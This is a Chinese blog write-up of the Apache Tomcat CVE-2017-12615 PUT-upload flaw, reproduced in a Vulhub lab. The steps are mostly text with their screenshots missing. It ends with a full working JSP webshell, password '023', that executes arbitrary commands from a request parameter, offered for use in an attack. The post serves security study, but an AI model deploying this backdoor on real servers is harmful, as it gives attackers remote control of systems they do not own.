Apache Tomcat任意文件上传漏洞(CVE-2017-12615)

最新推荐文章于 2024-05-24 10:12:07 发布
最新推荐文章于 2024-05-24 10:12:07 发布
阅读量2k 收藏 4
点赞数 3
分类专栏: web安全-文件上传 文章标签: web安全 安全 中间件 服务器 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62808713/article/details/128794436
版权

一、漏洞起源

2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞,漏洞CVE编号:CVE-2017-12615和CVE-2017-12616。

其中,远程代码执行漏洞(CVE-2017-12615) 影响的版本有: Apache Tomcat 7.0.0 - 7.0.79(7.0.81修复不完全) 。

当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件,并且能被服务器执行。

二、基本信息

  • 漏洞名称:Tomcat任意文件上传漏洞

  • 漏洞编号:CVE-2017-12615

  • 漏洞影响:上传包含任意代码的文件,并且能被服务器执行。

  • 影响系统:Windows系统

  • 影响版本:Apache Tomcat 7.0.0 - 7.0.81

三、漏洞复现

这里使用“Vulhub搭建漏洞测试靶场“。

  1. 使用如下命令启动靶场环境。

  1. 查看ip地址。

  1. 查看端口信息。

  1. 进入靶场页面。

  1. 重新访问此页面来抓取数据包。

  1. 确认有没有“1.jsp”,访问以下网址返回下面页面可以确认没有。

  1. 将“Vulhub靶场”内的数据包复制后粘贴替换刚刚抓取到的数据包。

  1. 此处为刚刚查询的ip以及端口号。

  1. 放包后再次访问“1.jsp”,发现存在了。

  1. 如果想要进行攻击,只需将“shell”换成jsp的后门文件即可。

如:
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%>
     
    <%!public static String excuteCmd(String c) {
     
    StringBuilder line = new StringBuilder();
     
    try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));
     
    String temp = null;while ((temp = buf.readLine()) != null) {
     
    line.append(temp+"\n");}buf.close();} catch (Exception e) {
     
    line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){
     
    out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>

ranzi.
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Apache Tomcat任意文件上传漏洞CVE-2017-12615
weixin_43736941的博客
07-28 662
漏洞描述 当存在漏洞Tomcat 运行在 Windows 主机上,且启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 的webshell文件,JSP文件中的恶意代码将能被服务器执行,导致服务器上的数据泄露或获取服务器权限。 影响范围 Apache Tomcat 7.0.0 – 7.0.79 复现过程 1.环境搭建,在CenOs7靶机 ip 172.16.2.129 上利用doc
Tomcat任意文件上传漏洞(CVE-2017-12615)
锋刃科技的博客
06-12 1328
1、简介 Tomcat 是常见的Web 容器, 用户量非常巨大 2、影响版本 Tomcat 7.0.0 - 7.0.81 3. 漏洞指纹 tomcat 8009 ajp \x04\x01\xf4\x00\x15 4、环境搭建 这里我们用vulhub和docker组合搭建环境 cd vulhub/tomcat/CVE-2017-12615 docker-compose build docker-compose up -d 转存失败重新上传取消 ...
Tomcat代码执行漏洞(CVE-2017-12615)
Li-D的博客
08-30 7318
漏洞描述 2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞漏洞CVE编号:CVE-2017-12615CVE-2017-12616,其中 远程代码执行漏洞CVE-2017-12615) 当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。之后,JSP 文件中的代码将能被服务器执行。 影响版
CVE-2017-12615(远程代码执行漏洞
Biu_Biu_Bi的博客
04-07 1681
Tomcat 运行在 Windows 操作系统时,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行。2、使用burpsuite抓包,修改GET为PUT上传方式,添加文件名1.jsp/,添加shell脚本。1、使用冰蝎v4.05生成jsp脚本。5、打开ip:8080,成功开启。4、测试成功上传Shell。
中间件安全Tomcat常见漏洞
最新发布
zz12345600354的博客
05-24 738
链接。
CVE-2017-12615 Tomcat任意文件上传漏洞详解
永远是少年
10-02 1867
今天继续给大家介绍渗透测试相关知识,本文主要内容是CVE-2017-12615 Tomcat任意文件上传漏洞详解。 一、漏洞简介 二、Vulhub漏洞环境启动 三、漏洞实战
Tomcat任意写入文件漏洞CVE-2017-12615
黑白的博客
11-22 9283
声明 好好学习,天天向上 漏洞描述 2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞漏洞CVE编号:CVE-2017-12615CVE-2017-12616,其中 远程代码执行漏洞CVE-2017-12615) 影响: Apache Tomcat 7.0.0 - 7.0.79(7.0.81修复不完全) 当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能
tomcat7.x远程命令执行(CVE-2017-12615漏洞利用复现
m0_58606546的博客
01-11 4059
一、漏洞前言 2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞漏洞CVE编号:CVE-2017-12615CVE-2017-12616,该漏洞受影响版本为7.0-7.80之间,在一定条件下,攻击者可以利用这两个漏洞,获取用户服务器上 JSP 文件的源代码,或是通过精心构造的攻击请求,向用户服务器上传恶意JSP文件,通过上传的 JSP 文件 ,可在用户服务器上执行任意代码,从而导致数据泄露或获取服务器权限,存在高安全风险 二、漏洞名称 CVE-2017-12615-远程代
CVE-2017-12615利用脚本
04-16
CVE-2017-12615是一个在Apache Tomcat服务器中发现的安全漏洞,该漏洞允许攻击者通过PUT方法上传恶意文件并执行任意命令,从而对系统造成严重的安全威胁。这个漏洞主要涉及到Tomcat文件上传功能,特别是其处理...
Apache Tomcat 文件包含漏洞(CNVD-2020-10487,对应 CVE-2020-1938)
03-05
CNVD-2020-10487 和 CVE-2020-1938 是同一个安全漏洞的不同命名,这个漏洞被称为“Apache Tomcat 文件包含漏洞”。此漏洞的存在使得攻击者有可能通过精心构造的请求,将恶意代码注入到Tomcat服务器上,从而执行任意...
CVE-2020-1938 Apache Tomcat 文件包含EXP
03-29
2月20日,国家信息安全漏洞共享平台(CNVD)发布了Apache Tomcat文件包含漏洞(CNVD-2020-10487/CVE-2020-1938)。该漏洞是由于Tomcat AJP协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数,读取服务器...
关于Apache Tomcat存在文件包含漏洞的整改方法
01-09
2020年1月6日,国家信息安全漏洞共享平台(CNVD)收录了由北京长亭科技有限公司发现并报送的Apache Tomcat文件包含漏洞(CNVD-2020-10487,对应CVE-2020-1938)。攻击者利用该漏洞,可在未授权的情况下远程读取特定...
腾讯云安全中心监测到  Apache Tomcat 修复了2个严重级别的漏洞
09-25
9 月 19 日,腾讯云安全中心监测到 Apache Tomcat 修复了2个严重级别的漏洞, 分别为: 信息泄露漏洞CVE-2017-12616)、远程代码执行漏洞CVE-2017-12615),在某些场景下,攻击者将分别能通过这两个漏洞,获取...
Tomcat任意文件写入(CVE-2017-12615)漏洞复现
weixin_45540609的博客
07-28 1916
一、漏洞原理 影响范围:pache Tomcat7.0.0-7.0.81(默认配置) 如果配置了默认servlet,则在9.0.1(Beta),8.5.23,8.0.47和7.0.82之前的所有Tomcat版本都包含所有操作系统上的潜在危险的远程执行代码(RCE)漏洞CVE-2017-12615:远程代码执行漏洞。只需参数readonly设置为false或者使用参数readonly设置启用WebDAV servlet false。此配置将允许任何未经身份验证的用户上传文件(如WebDAV中所使用的).
tomcat漏洞任意文件上传CVE-2017-12615
weixin_53711701的博客
12-24 2907
tomcat漏洞任意文件上传CVE-2017-12615
CVE-2017-12615漏洞复现
weixin_44831109的博客
03-30 1315
1.靶场172.168.20.176(内网的外网访问不到) 2.使用goby 发现8080端口开放以及一个高危漏洞 发现CVE-2017-12615漏洞 3.使用burpsuit抓包 发送給重发器 将get方法改成put方法 上传一个jsp一句话木马 更改发送到右边显示这样说明成功 木马成功上传 4.使用冰蝎 连接密码是冰蝎默认的 root权限 ...
[CVE-2017-12615] Tomcat任意写入文件漏洞重现
aovenus的专栏-测试新时代(微信公众号:测试新时代)
10-18 937
[CVE-2017-12615] Tomcat任意写入文件漏洞重现
CVE-2017-12615 Tomcat远程命令执行漏洞
mirocky的博客
10-13 556
2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞漏洞CVE编号:CVE-2017-12615CVE-2017-12616,其中 远程代码执行漏洞CVE-2017-12615) 当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。之后,JSP 文件中的代码将能被服务器执行。
Tomcat远程代码执行漏洞CVE-2017-12615
热门推荐
Unitue_逆流
10-14 1万+
实验环境操作机:windows XPIP:172.16.11.2目标机:windows server 2003IP:172.16.12.2实验目的了解Tomcat远程代码执行漏洞危害掌握检测利用Tomcat远程代码执行漏洞的能力实验工具Firefox: 中文俗称火狐,一个自由及开放源代码网页浏览器实验内容 TomcatTomcat服务器是一个免费的开放源代码的Web应用服务器Tomcat是Apa
Apache Tomcat文件包含漏洞(CVE-2020-1938)
09-11
嗨!对于Apache Tomcat文件包含漏洞(CVE-2020-1938),该漏洞是在2020年2月份公开的,影响Tomcat 9.0.0.M1至9.0.30以及8.5.0至8.5.50版本。该漏洞允许攻击者通过发送特制的请求来执行任意文件的读取和包含。 该漏洞的根本原因在于Tomcat的处理器组件(Servlet、WebSocket等)对于路径参数错误地解析了请求。攻击者可以利用这一点来读取或包含Web应用程序中的敏感文件,甚至可能在服务器上执行恶意代码。 由于该漏洞的危害性较高,建议及时升级到Tomcat 9.0.31或8.5.51版本,这些版本修复了该漏洞。此外,如果无法立即升级,你可以考虑使用防火墙或其他网络安全设备来限制对Tomcat端口的访问,从而减轻潜在攻击的风险。 记住,定期更新和维护所有软件和库是保持系统安全的重要措施之一。同时,合理配置服务器和应用程序,限制访问权限,并进行网络安全审计也是必要的。如果你是Tomcat用户,请务必关注并采取适当的措施来保护你的系统免受该漏洞的影响。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ranzi.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值